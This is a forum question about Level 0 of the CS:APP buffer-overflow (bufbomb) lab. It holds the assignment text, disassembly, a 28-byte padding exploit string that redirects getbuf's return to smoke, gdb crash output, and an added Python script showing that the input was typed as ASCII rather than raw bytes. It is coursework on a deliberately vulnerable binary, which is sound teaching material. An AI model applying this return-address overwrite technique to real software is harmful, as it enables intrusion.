zawdcxsa 2017-03-10 06:30 Acceptance rate: 0%
Views: 1008

CS:APP buffer overflow attack

Level 0: Candle (10 pts)
The function getbuf is called within BUFBOMB by a function test having the following C code:
1 void test()
2 {
3     int val;
4     volatile int local = 0xdeadbeef;
5     entry_check(3); /* Make sure entered this function properly */
6     val = getbuf();
7     /* Check for corrupted stack */
8     if (local != 0xdeadbeef) {
9         printf("Sabotaged!: the stack has been corrupted\n");
10    }
11    else if (val == cookie) {
12        printf("Boom!: getbuf returned 0x%x\n", val);
13        validate(3);
14    }
15    else {
16        printf("Dud: getbuf returned 0x%x\n", val);
17    }
18 }
When getbuf executes its return statement (line 5 of getbuf), the program ordinarily resumes execution within function test (at line 8 of this function). Within the file bufbomb, there is a function smoke having the following C code:
void smoke()
{
    entry_check(0); /* Make sure entered this function properly */
    printf("Smoke!: You called smoke()\n");
    validate(0);
    exit(0);
}
Your task is to get BUFBOMB to execute the code for smoke when getbuf executes its return statement, rather than returning to test. You can do this by supplying an exploit string that overwrites the stored return pointer in the stack frame for getbuf with the address of the first instruction in smoke. Note that your exploit string may also corrupt other parts of the stack state, but this will not cause a problem, since smoke causes the program to exit directly.

Some Advice:
All the information you need to devise your exploit string for this level can be determined by examining a disassembled version of BUFBOMB.
Be careful about byte ordering.
You might want to use GDB to step the program through the last few instructions of getbuf to make sure it is doing the right thing.
The placement of buf within the stack frame for getbuf depends on which version of GCC was used to compile bufbomb. You will need to pad the beginning of your exploit string with the proper number of bytes to overwrite the return pointer. The values of these bytes can be arbitrary.
As you can see: "Your task is to get BUFBOMB to execute the code for smoke when getbuf executes its return statement, rather than returning to test."
So the task is to change the return address of getbuf to the address of smoke.
Disassembly of getbuf:
0x08048ad0 <+0>: push %ebp
0x08048ad1 <+1>: mov %esp,%ebp
0x08048ad3 <+3>: sub $0x28,%esp
0x08048ad6 <+6>: lea -0x18(%ebp),%eax
0x08048ad9 <+9>: mov %eax,(%esp)
0x08048adc <+12>: call 0x80489c0
0x08048ae1 <+17>: leave
0x08048ae2 <+18>: mov $0x1,%eax
0x08048ae7 <+23>: ret

As you can see, buf sits 4+0x18=0x1c bytes below the return address, which is 28 in decimal, so the input has to be padded with 28 bytes followed by the address of smoke.
Disassembly of smoke:
Dump of assembler code for function smoke:
0x08048eb0 <+0>: push %ebp
0x08048eb1 <+1>: mov %esp,%ebp
0x08048eb3 <+3>: sub $0x8,%esp
0x08048eb6 <+6>: movl $0x80495f7,(%esp)
0x08048ebd <+13>: call 0x8048758 puts@plt
0x08048ec2 <+18>: movl $0x0,(%esp)
0x08048ec9 <+25>: call 0x8048af0
0x08048ece <+30>: movl $0x0,(%esp)
0x08048ed5 <+37>: call 0x80487e8 exit@plt
The address of smoke is 08048eb0, and since this is a little-endian machine
I fill in:
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 b0 8e 04 08
But no matter what I do it is wrong; the output is:
run -t wu<text.txt
Starting program: /home/zawdcxs/Desktop/bufbomb -t wu<text.txt
Team: wu
Cookie: 0x706f2ba4

Program received signal SIGSEGV, Segmentation fault.
0x30302030 in ?? ()
I also tried entering 12 characters, just over the length of buf, and got the same message as above. In theory padding with 28 characters first should be fine.
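A small crash-triage script, added here and not part of the original post, that takes the input exactly as typed above (reconstructed as an ASCII text file) together with the faulting address from the SIGSEGV message, and reports which input bytes ended up in getbuf's return slot; the 0x1c offset and the smoke address come from the post, everything else is constructed.

```python
# Constructed: the two lines of text.txt as the poster typed them, i.e. as
# ASCII hex digits and spaces, not as the raw byte values they spell out.
INPUT_TEXT = (
    "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n"
    "00 00 00 00 00 00 00 00 00 00 00 00 00 b0 8e 04 08\n"
)
FAULT_EIP = 0x30302030  # from "Program received signal SIGSEGV ... 0x30302030 in ?? ()"
RET_OFFSET = 0x1c       # buf at -0x18(%ebp), saved return address at 4(%ebp)
SMOKE_ADDR = 0x08048eb0 # first instruction of smoke, from the disassembly above


def return_slot_value(data, ret_offset=RET_OFFSET):
    """The 32-bit little-endian value that the 4 input bytes at ret_offset would load into EIP."""
    return int.from_bytes(data[ret_offset:ret_offset + 4], "little")


def fault_source_offset(data, eip, ret_offset=RET_OFFSET):
    """Offset of the input bytes that became EIP: the return slot if it matches,
    otherwise the first matching 4-byte window, or None if the input cannot explain the fault."""
    needle = eip.to_bytes(4, "little")
    if data[ret_offset:ret_offset + 4] == needle:
        return ret_offset
    for i in range(len(data) - 3):
        if data[i:i + 4] == needle:
            return i
    return None


def eip_as_text(eip):
    """Render the faulting address as the ASCII characters its bytes encode;
    a readable result means the overwritten slot was filled with text, not binary."""
    return eip.to_bytes(4, "little").decode("ascii", errors="replace")


def decode_as_raw(text):
    """What the same text produces once each hex token is converted to one byte
    (the conversion a hex2raw-style tool performs before the program reads the input)."""
    return bytes(int(tok, 16) for tok in text.split())


if __name__ == "__main__":
    typed = INPUT_TEXT.encode("ascii")
    print("return slot as typed: 0x%08x" % return_slot_value(typed))
    print("fault bytes come from input offset:", fault_source_offset(typed, FAULT_EIP))
    print("fault address spells: %r" % eip_as_text(FAULT_EIP))
    raw = decode_as_raw(INPUT_TEXT)
    print("return slot after raw conversion: 0x%08x" % return_slot_value(raw))
```

The faulting address decodes to the characters "0 00" found at offset 28 of the text file, so the program consumed the file as literal characters rather than as the bytes those characters spell; after a raw conversion the same 32 bytes place 0x08048eb0 in the return slot.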


1 answer

  • devmiao 2017-03-10 23:23
